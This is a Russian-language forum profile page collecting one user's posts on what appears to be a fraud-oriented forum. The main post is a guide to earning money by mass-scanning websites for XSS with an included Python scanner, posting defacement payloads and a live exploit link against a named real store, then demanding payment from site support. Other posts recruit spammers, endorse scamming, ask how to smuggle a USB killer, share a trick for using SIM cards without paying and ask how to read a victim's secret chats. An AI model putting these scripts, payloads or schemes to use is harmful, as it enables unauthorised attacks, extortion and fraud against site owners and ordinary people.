Перейти к публикации

Eivrus

Новичoк
  • Публикации

    24
  • Зарегистрирован

  • Посещение

Все публикации пользователя Eivrus

  1. И так, зарабатывать мы с вами будем на поиске XSS уязвимости на сайтах. Алгоритм работы: 1. Ищем сайт с XSS уязвимостью 2. Связываемся с поддержкой сайта 3. Просим у них деньги за обнаружение уязвимости Для начала вам необходимо ознакомиться с тем, что такое XSS уязвимость XSS (Cross-Site Scripting) - уязвимость позволяющая вам выполнять свой JS (JavaScript) код на чужом сайте, за счёт чего вы можете взламывать его пользователей, красть их данные, подменять код сайта и многое другое)) Для проверки сайта на наличие XSS уязвимости достаточно вставить в поисковую строку следующий JS код. ⁡⁡<script>alert("XSS")</script>⁡ Для примера возьмём сайт stolplit.ru: Т.е если на сайте появляется уведомление с надписью «XSS», то на нём есть уязвимость. Самый простой способ эксплуатации XSS уязвимости - подмена кода сайта. Для неё достаточно просто вставить следующий JS код в поисковую строку ⁡⁡<script>document.body.innerHTML = "<H1 style='color: black; text-align: center;'>C 01.05.2024 сайт перестаёт работать</H1>";</script>⁡ Опасность тут в том, что любой кто перейдёт по этой ссылке на сайт, увидит именно наш html код, а не html код сайта. Можете перейти по ссылке ниже и убедиться в этом: https://www.stolplit.ru/internet-magazin/search/?is_submit=Y&product_title=⁡⁡<script>document.body.innerHTML+=+"<H1+style='color:+black;+text-align:+center;'>C+01.05.2024+сайт+перестаёт+работать</H1>";</script>⁡ Поиск сайтов с уязвимостью Сайты с XSS уязвимостью можно искать и вручную, но, тогда большая часть нашего времени будет уходить впустую. Я написал python скрипт для массовой проверки сайтов на наличие XSS уязвимости. 1. Загружаем установочный файл Python3 с официального сайта. https://www.python.org/downloads/release/python-3115/ 2. Запускаем установочный файл и следуем иснтрукциям по установке. при установке необходимо выбрать опцию "Add Python 3.x to PATH". 3. После установки Python3, открываем командную строку (cmd), и вводим следующие команды ⁡⁡pip install bs4⁡ ⁡⁡⁡⁡pip install requests⁡ ⁡⁡pip install colorama⁡ 4. Создаем папку, например WORK. В этой папке создаём 2 файла - main.py и site.txt 5. В файл main.py необходимо вставить код предоставленный ниже Код Python: from colorama import init, Fore, Back, Style from bs4 import BeautifulSoup as bs import requests from urllib.parse import urljoin from pprint import pprint import time headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36" } init(autoreset=True) def stop(stop_time): now_time = time.time() if stop_time - now_time <= 0: return True def save(url): file = open("goods.txt", "a") file.write(f"{url}\n") file.close() def scan_xss(url, stop_time, timeout): stop_time = time.time() + stop_time html = requests.get(url, headers=headers, timeout=timeout) soup = bs(html.content, "html.parser") forms = soup.find_all("form") js_script = "<Script>alert('XSS')</scripT>" is_vulnerable = False for form in forms: if stop(stop_time): break details = {} action = form.attrs.get("action") method = form.attrs.get("method", "get") if action != None and not(action.startswith("javascript")): action = action.lower() method = method.lower() else: break inputs = [] for input_tag in form.find_all("input"): input_type = input_tag.attrs.get("type", "text") input_name = input_tag.attrs.get("name") inputs.append({"type": input_type, "name": input_name}) details["action"] = action details["method"] = method details["inputs"] = inputs form_details = details target_url = urljoin(url, form_details["action"]) inputs = form_details["inputs"] data = {} for input in inputs: if input["type"] == "text" or input["type"] == "search": input["value"] = js_script input_name = input.get("name") input_value = input.get("value") if input_name and input_value: data[input_name] = input_value if form_details["method"] == "post": content = requests.post(target_url, data=data, headers=headers, timeout=timeout).content.decode('latin-1') else: content = requests.get(target_url, params=data, headers=headers, timeout=timeout).content.decode('latin-1') if js_script in content: save(url) print(f"{Fore.RED}[+] XSS Detected on {url}{Style.RESET_ALL}\n[*] Form details:") pprint(form_details) if __name__ == "__main__": urls = open('site.txt', 'r', encoding="UTF-8") for element in urls: url = element.replace("\n", "") print(f"\033[37m{url}") # Максимальное время проверки одного сайта в секундах (не менее 180) stop_time = 180 # Максимальное время ожидания ответа от сайта в секундах (не менее 15) timeout = 20 try: scan_xss(url, 180, 20) except: pass # ваще похуй urls.close() Для того, что бы скрипт начал искать уязвимость на сайтах необходимо вставить список сайтов в файл site.txt, открыть в CMD папку WORK и ввести следующую команду: ⁡python main.py⁡ После запуска скрипт начнёт проверять сайты из файла на наличие XSS уязвимости, если он обнаружит сайт с уязвимостью, то выведет красным цветом его url и белым дополнительную информацию (где конкретно он нашёл уязвимость), а так же запишет url сайта в файл goods.txt. Важное уточнение: возможны ложные срабатывания скрипта (может вывести сайт без уязвимости), поэтому всегда перепроверяйте сайт вручную. Откуда брать сайты? Самое сложное в этом способе заработка - достать список сайтов. Я расскажу вам о способе которым сам пользовался: Заходим на любой сайт для выгрузки топ 100 сайтов из яндекса или гугла, например https://pr-cy.ru/tools/check-keywords/ Вводим произвольный поисковой запрос, например «Купить мебель с доставкой спб», указываем глубину поиска - топ 100, выбираем любой регион и жмём на кнопку «Проверить» После недолгого ожидания мы получаем 100 ссылок, их нужно скопировать и вставить в файл site.txt. Cвязываемся с поддержкой После того как скриптом был найден сайт с уязвимостью, первым делом вы перепроверяете наличие уязвимости на сайте. Если она и в правду есть, то вы ищите почту поддержки сайта и пишите на неё о том, что нашли на сайте опасную уязвимость. Всё общение с поддержкой сайта сводится к отправке текста по шаблону, ниже привёл пример успешного диалога с поддержкой сайта. FAQ Нарушает ли эта тема закон? (272 статью УК. РФ) Ответ от юриста: «Как гласит Статья 272 УК РФ, Неправомерный доступ к охраняемой законом компьютерной информации, если это деяние повлекло уничтожение, блокирование, модификацию либо копирование компьютерной информации. В нашем случае доступ к какой-либо информации не осуществляется, мы показываем лишь способ. XSS уязвимость позволяет выполнять код на стороне клиента, то есть публичной подмены кода сайта не осуществляется. XSS это не взлом и мы не сразу получаем доступ к информации как например sql, XSS это способ. Кроме того, исходя из субъективной стороны данного преступления, как таковой корысти в данном случае мы не имеем, это этичный хакинг (Хотя его даже хакингом назвать нельзя). Субъективная сторона предусматривает цель, мотив. Цели взлома сайта, его пользователей у нас нет. Мотив понятие большое, и то что мы лишь после того как отправили сообщение об обнаруженной уязвимости просим деньги, не говорит о том что мы хотели этого с самого начала, мы хотим получить благодарность за свою работу. Соответственно, заявить на нас что мы с корыстной взломали их сайт и требуем выкуп никто не сможет.» Как устранять уязвимость? Для устранения уязвимости достаточно фильтровать текст вводимый пользователем, например убирать из его запроса следующие символы: <, >, /, (, ). Если вы не имеете значительного опыта в веб разработке, то не беритесь за устранение уязвимости, есть риск только ухудшить ситуацию. Что писать в тех. поддержку? Здравствуйте, я нашёл достаточно опасную уязвимость на вашем сайте (домен сайта), продемонстрировать? У вас на сайте XSS уязвимость, т.е сайт выполняет любой мой JS код на стороне пользователя. Это может привести к подмене кода сайта, краже данных пользователей, их аккаунтов или созданию фейковых уведомлений. Для устранения достаточно просто фильтровать данные вводимые пользователем, например убирать <, >, /, (, ) из запроса. Вот один из самых простых примеров эксплуатации данной уязвимости - подмена HTML кода сайта (и стилей CSS) формируем JS код <script>document.body.innerHTML = "<H1 style='color: black; text-align: center;'><br>C 01.05.2024 сайт перестаёт работать</H1>";</script> вставляем его в поисковую строку на вашем сайте, выполняем запрос и получаем результат (Фото с выполнением JS кода на сайте) Опасность тут в том, что любой кто перейдёт по ссылке увидит именно мой html код, а не html код сайта (можете перейти и убедиться) (Ссылка на их сайт с выполняющимся JS кодом) Дальше отвечайте в зависимости от развития диалога. Спрашивают сколько перевести, какую сумму называть? Я всегда называл 3-5к и получал эту сумму, наглеть и просить больше тут явно не стоит.
  2. ищу тех кто сделает это. гарант + готов хорошо заплатить
  3. Eivrus

    С чего начать в скаме

    С изучением статей УК
  4. Eivrus

    Ключи на 2 месяца Яндекс Мульти

    Не один не работает
  5. сегодня с паером прогнал пару обменов, все впорядке было
  6. Eivrus

    Tik-Tok траффик

    Выгорит если тема залетит в рек
  7. Eivrus

    Слив обуча p2p

    бро , это зашквар , это тема 2019 года
  8. 3 не полных дня поиска https://www.blockchain.com/btc/address/1NrSw5DSEcbXGHk8S54dWYt2f8v3uxJz2r
  9. много тем в последнее никак если там 2фа то как ты сломаешь
  10. Нужны спамеры, всем работающим по этой теме прошу отпсисать в ЛС.
  11. Eivrus

    Арабы в телеграме

    их скамить хорошо
  12. Eivrus

    Хобби

    Собирай марки, открытки, монеты, валюты, купюры, фигурки машин или аниме.
  13. Всем добрый вечер , что сделать, чтобы например ubs killer не отняли на таможне или что-нибудь ещё?
  14. Перед вами слив темы по получению бесплатных сим-карт из-под космического хайда. 1. Переходим по ссылке ; 2. Открываем раздел «Товары »; 3. Листаем вниз и ищем следующие тарифы: А) Тариф "Мой бизнес S" 100₽ Б) Тариф "Мой бизнес M" 100₽ В) Тариф "Мой бизнес L" 100₽ 4. Выбираем любой тариф и заказываем сим-карту у продавца; 5. Используем сим-карту до её блокировки; 6. PROFIT! Вся фишка в том, что оплатить сим-карту можно после получения (это сделано для проверки связи). Таким образом мы можем в течение нескольких часов использовать симки для всевозможных регистраций, после чего они будут заблокированы.
  15. Появились некоторые вопросы по поводу секретного чата в телеге. 1. Можно ли получить доступ к секретному чату, имея аккаунт? 2. Какие хлебные крошки можно найти в телефоне жертвы, после переписки в секретном чате, остается ли хоть что-то? 3. Можно ли узнать, с кем и когда был создан секретный чат, имея доступ к аккаунту? 4. Если пользователь А создаст секретный чат с пользователем Б, аккаунт которого подключен к двум телефонам, на котором из них создастся секретный чат? Ну и вообще, есть более подробная информация по работе секретных чатов в телеге? Заранее спасибо всем.
  16. Eivrus

    MockPlus Cloud / 180 дней.

    Потом все равно платить? Когда закончится лицензия а приложению надо работать как то
  17. Eivrus

    оффлайн обменник

    офаалайн обменник крипты, стоит ли им доверять?
  18. Eivrus

    Номера под телеграм

    как минимум здесь человек продавал, здесь на форуме
  19. Рано или поздно слив персональных данных может случиться с каждым, никто от этого не застрахован. Fake Contacts — приложение, которое создает поддельные контакты в вашей телефонной книге. Как пользоваться: 1. Скачиваем и устанавливаем приложение Fake Contacts пакетом или из приложения F-Droid. 2. Нажимаем на “Create Fake Contacts”. При запуске приложения появится окно с созданием фейковых контактов. 3. Проверяем телефонную книжку на наличие фейковых аккаунтов и используем эти контакты, чтобы избежать утечки. Пользуйтесь и всегда помните про конфиденциальность своих данных.
  20. Eivrus

    Биток

    Особенно сейчас
  21. Eivrus

    Биткоин по 100к

    Ждать ли нам такого чуда в январе?
  22. Eivrus

    Реальный кардинг

    этот как сказки наночь
  23. Eivrus

    Как приумножить 20К $?

    на коинлист зайди
  24. Как для первохода в криптовалютных делах это очень серьёзный шаг. Такого крутого поворота под конец года я не ожидал. Прям подарок от судьбы. Представлю вам один из кошельков https://blockchair.com/ethereum/address/0x3b85b1fc20c26a327bb4dd9703b9880a5bc390c2
×
×
  • Создать...